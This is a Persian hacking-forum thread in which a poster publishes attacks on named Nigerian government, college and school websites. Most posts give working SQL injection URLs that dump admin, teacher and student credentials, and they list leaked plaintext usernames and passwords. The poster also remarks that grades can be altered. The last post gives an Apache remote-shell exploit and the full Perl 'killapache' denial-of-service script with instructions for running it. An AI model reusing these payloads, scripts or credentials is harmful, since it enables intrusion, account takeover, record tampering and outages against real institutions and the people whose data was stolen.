پرش به


تصویر

دیتابیس دامنه های gov و کالج (دانشگاه) های نیجریه


  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
7 پاسخ برای این موضوع

#1 ارسالی 15 ژوئن 2016 - 07:35

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

به نام خدا

 

چند روزی هست که روی دامنه های ng (نیجریه) تمرکز داشتم تا امنیت سایت های نیجریه رو بررسی کنم که متاسفانه افتضاح بود.

 

تصمیم بر این گرفتم که تاپیکی بزنم و دیتابیس های مهم این کشور رو در اینجا قرار بدم.

 

خب دیتابیس هایی که تا الان زده شده از جمله » چندتا .gov - و مدرسه و کالج و دانشگاه هستش.

 

از پست بعد دیتابیس هارو قرار میدم.


ویرایش شده توسط Blackwolf_Iran 16 ژوئن 2016 - 02:20 .

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#2 ارسالی 16 ژوئن 2016 - 02:27

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

دانشگاه (کالج) Ebonyi State

آدرس : http://coeikwo.edu.ng

حفره نفوذ : MySQL Error Based Injection

فایل حفره دار : news.php

پارامتر : id

لینک آسیب پذیر :

http://coeikwo.edu.ng/news.php?id=16

به دلیل اینکه Error Based Injection هست سطر به سطر اینجکت شد تیبل ادمین که حاوی 3 سطر بود »

http://coeikwo.edu.ng/news.php?id=16%27%20and%20%28select%201%20from%20%28Select%20count%28*%29,Concat%28%28select%20concat%280x456d61696c3a,email_usr,0x2050617373776f72643a,password_usr%29%20from%20user_usr%20limit%200,1%29,0x20202020,floor%28rand%280%29*2%29%29y%20from%20information_schema.tables%20group%20by%20y%29%20x%29--%20-

سطر دوم از تیبل ادمین :

http://coeikwo.edu.ng/news.php?id=16' and (select 1 from (Select count(*),Concat((select concat(0x456d61696c3a,email_usr,0x2050617373776f72643a,password_usr) from user_usr limit 1,1),0x20202020,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

سطر سوم از تیبل ادمین :

http://coeikwo.edu.ng/news.php?id=16' and (select 1 from (Select count(*),Concat((select concat(0x456d61696c3a,email_usr,0x2050617373776f72643a,password_usr) from user_usr limit 2,1),0x20202020,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#3 ارسالی 16 ژوئن 2016 - 02:36

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

پژوهشگران راه و ساختمان

آدرس : http://nbrri.gov.ng

نوع آسیب پذیری : SQL injection

فایل آسیب پذیر : news.php

پارامتر : ID

لینک آسیب پذیری :

http://www.nbrri.gov.ng/sites/news.php?ID=2

صفحات ورودی :

http://www.nbrri.gov.ng/loginf.php
http://www.nbrri.gov.ng/sites/userlogin.php

یوزر و پسورد ادمین :

http://www.nbrri.gov.ng/sites/news.php?ID=-2+UNION+SELECT+1,2,3,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28userlogin%29%20where%20%280x00%29[email protected]:[email protected],0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,5,6,7,8,9,10,11--+
id : 0 Username : dayo Password : xdayox
id : 1 Username : admin_nsiwc Password : zuwvmuc3

کاربران اصلی :

http://www.nbrri.gov.ng/sites/news.php?ID=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e20,3,(select (@x) from (select (@x:=0x00),(select (0) from (loginn) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password,0x20456d61696c203a20,email))))x),5,6,7,8,9,10,11--+

تمامی یوزر و پسورد ها :

http://www.nbrri.gov.ng/sites/news.php?ID=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e20,3,(select (@x) from (select (@x:=0x00),(select (0) from (login) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password,0x20456d61696c203a20,email))))x),5,6,7,8,9,10,11--+

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#4 ارسالی 16 ژوئن 2016 - 02:44

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

دانشگاه مرکزی GOMBE

ادرس : http://gsu.edu.ng

نوع آسیب پذیری : SQL injection

صفحه آسیب پذیر : news.php

پارامتر : nid

لینک آسیب پذیر :

http://gsu.edu.ng/news.php?nid=2

توجه : این سایت دارای چند نوع اسکریپت هست بنابراین چند نوع دیتابیس موجود هست که با صفحه ورودی براتون میزارم :

ادمین اصلی خود سایت :

http://gsu.edu.ng/news.php?nid=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,3,(select (@x) from (select (@x:=0x00),(select (0) from (gsudatabase.user_login) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password))))x),5,6,7,8--+

ورودی ادمین :

http://gsu.edu.ng/admin/login.php

یوزر و پسورد وردپرس :

http://gsu.edu.ng/news.php?nid=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,3,(select (@x) from (select (@x:=0x00),(select (0) from (gsuword.wp_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,user_login,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,user_pass))))x),5,6,7,8--+

ورودی وردپرس :

http://www.gsu.edu.ng/wordpress/wp-login.php?redirect_to=http%3A%2F%2Fwww.gsu.edu.ng%2Fwordpress%2Fwp-admin%2F&reauth=1

اینم دوباره ادمین هستش :

http://gsu.edu.ng/news.php?nid=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,3,(select (@x) from (select (@x:=0x00),(select (0) from (suresite.bak_wxn1y_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password))))x),5,6,7,8--+

ادمین و کاربران اصلی :

http://gsu.edu.ng/news.php?nid=-2+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,3,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28suresite.wxn1y_users%29%20where%2[email protected]:[email protected],0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,5,6,7,8--+

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#5 ارسالی 16 ژوئن 2016 - 02:55

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

مدرسه Efficient (اطلاع خاصی ندارم که اسمش این هست یا نه)

آدرس : http://www.efficientschools.com.ng

نوع آسیب پذیری : SQL injection

فایل آسیب پذیر : news.php

پارامتر : id

لینک آسیب پذیری :

http://www.efficientschools.com.ng/news.php?id=6462

یوزر و پسورد دانش آموزان و .ادمین :

http://www.efficientschools.com.ng/news.php?id=-6462'+UNION+SELECT+1,0x204861636b656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (veri) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,uname,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,pass,0x3c68723e))))x),4,5,0x204861636b656420427920426c61636b776f6c665f4972616e--+

معلم ها :

http://www.efficientschools.com.ng/news.php?id=-6462%27+UNION+SELECT+1,0x204861636b656420427920426c61636b776f6c665f4972616e,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20i[email protected]:[email protected],0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,user_id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,uname,0x3c666f6e7420636f6c6f723d7265643e20507764203a20,pwd%29%29%29%29x%29,4,5,0x204861636b656420427920426c61636b776f6c665f4972616e--+

از خود سایت هم قسمت لاگین میتونین لاگین کنین

برای مثال اسکرین شات یکی از معلم ها :

 

(نکته : میتونین نمرات رو هم تغییر بدین)

 

 

noa3xej3pd30el0foafd.jpg


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#6 ارسالی 16 ژوئن 2016 - 03:04

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

آکادمی علوم GRACELAND

آدرس : http://www.gracelandacademy.com.ng

نوع آسیب پذیری : SQL injection

فایل آسیب پذیر : news.php

پارامتر: id

لینک آسیب پذیری :

http://www.gracelandacademy.com.ng/news.php?id=6780

یوزر و پسورد ادمین + دانشجویان(دانش آموزان) :

http://www.gracelandacademy.com.ng/news.php?id=-6780'+UNION+SELECT+1,0x204861636b656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,user_id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,uname,0x3c666f6e7420636f6c6f723d7265643e20507764203a20,pwd,0x3c62723e))))x),4,5,0x204861636b656420427920426c61636b776f6c665f4972616e--+
id : Cashier Username : Cashier Pwd : admin123

id : GSA/ADMIN/2015/109 Username : GSA/ADMIN/2015/109 Pwd : EDOGBO

id : GSA/ADMIN/2015/407 Username : GSA/ADMIN/2015/407 Pwd : SANI

id : GSA/EIDKG/2015/1 Username : GSA/EIDKG/2015/1 Pwd : ZEKERI

id : GSA/EIDKG/2015/10 Username : GSA/EIDKG/2015/10 Pwd : ADAH

id : GSA/EIDKG/2015/11 Username : GSA/EIDKG/2015/11 Pwd : EZEME

id : GSA/EIDKG/2015/13 Username : GSA/EIDKG/2015/13 Pwd : YUSUFU 

لاگین هم درون خود سایت وجود داره


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#7 ارسالی 16 ژوئن 2016 - 03:13

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

آژانس خلق توانگری و سلامت ondo

آدرس : http://www.wecaondo.on.gov.ng

نوع آسیب پذیری : SQL injection

فایل آسیب پذیر : news.php

پارامتر: id

لینک آسیب پذیری :

http://www.wecaondo.on.gov.ng/news.php?id=8

یوزر و پسورد ادمین :

http://www.wecaondo.on.gov.ng/news.php?id=-8%27+/*!50000UNION*/+SELECT+1,0x204861636b656420427920426c61636b776f6c665f4972616e,3,/*!50000GroUp_CoNcAt%280x204944203a20,id,0x20557365726e616d65203a20,uname,0x2050617373776f7264203a20,pass,0x3c68723e3c62723e%29*/,5,6,7,8,9+/*!50000from*/+admin--+
 ID : 1 Username : olamide Password : [email protected]

یوزر و پسورد کاربران :

http://www.wecaondo.on.gov.ng/news.php?id=-8%27+/*!50000UNION*/+SELECT+1,0x204861636b656420427920426c61636b776f6c665f4972616e,3,/*!50000GroUp_CoNcAt%280x204944203a20,id,0x20557365726e616d65203a20,uname,0x2050617373776f7264203a20,passw,0x3c68723e3c62723e%29*/,5,6,7,8,9+/*!50000from*/+register--+
ID : 13 Username : [email protected] Password : kenken
, ID : 12 Username : [email protected] Password : 08065991713
, ID : 11 Username : [email protected] Password : rugged
, ID : 7 Username : [email protected] Password : 1computer
, ID : 8 Username : [email protected] Password : akindele2015
, ID : 9 Username : [email protected] Password : kemade2011
, ID : 10 Username : [email protected] Password : myjesus2011

بیشتر در لینک اینجکت ......

توجه : ایمیل و پسورد ها صحیح هستن و میتونین با پسورد ها به ایمیل ها لاگین کنین اما چون آدم های مهمی هستن برای ایمیل هاشون پسورد دو مرحله ای رو فعال کردن.


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#8 ارسالی 16 ژوئن 2016 - 02:13

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 568 ارسال
    Last Visit یک هفته قبل
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Mr.s

بهتره کمی هم از مبحث دیتابیس هکینگ خارج شیم و به مباحث دیگه (حرفه ای تر) بپردازیم :

فدرال ایمن سازی جاده ها

آدرس : http://speedlimiter.frsc.gov.ng

نوع آسیب پذیری : Apache httpd Remote Deninal Of Service - Apache 2.2.14 mod_isapi Dangling Pointer

محل : آسیب پذیری از سرور

 

 

حفره : Apache 2.2.14 mod_isapi Dangling Pointer

اکسپلویت (Remote SYSTEM Exploit)Apache 2.2.14 mod_isapi Dangling Pointer :

screen Shot :

sspc9x34a0p9nv1zjjp.jpg

 

Exploit exe & cpp (rar): اکسپلویت

Exploit exe: اکسپلویت

بعد از اجرا کردن اکسپلویت به آدرس IP تارگت مورد نظر تلنت انجام میدین با پورت 4444 بعد به سرور وصل میشین و ترمینال سرور براتون میاد و هرکار میخواین بکنین.(در صورت گنگ بودن حتما پ.خ کنین آموزش میدم)

برای اکسپلویت کردن این حفره با متااسپلویت :

screen shot :

kali1_2016_06_16_03_30_46.jpg

 

فکر کنم واضح هستش دیگه احتیاج به توضیح نداره (اما اگه گنگ بود پ.خ کنین حتما آموزشش رو قرار میدم)

حفره : Apache httpd Remote Deninal Of Service

اکسپلویت : Apache httpd Remote Denial of Service (memory exhaustion)

use IO::Socket;
use Parallel::ForkManager;
 
sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}
 
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
     
$pm = new Parallel::ForkManager($numforks);
 
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}
 
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;   
     
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
 
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;   
} else {
    return 0;   
}
}
 
if ($#ARGV < 0) {
    usage;
    exit;   
}
 
if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}
 
$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;   
}
while(1) {
killapache();
}

سورس بالا رو در ی فایل پرل ذخیره میکنین به عنوان مثال : apache.pl

بعد به این صورت اجرا میکنین در ترمینال :

perl apache.pl target.com 50

apache ddos perl : دانلود


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر





0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP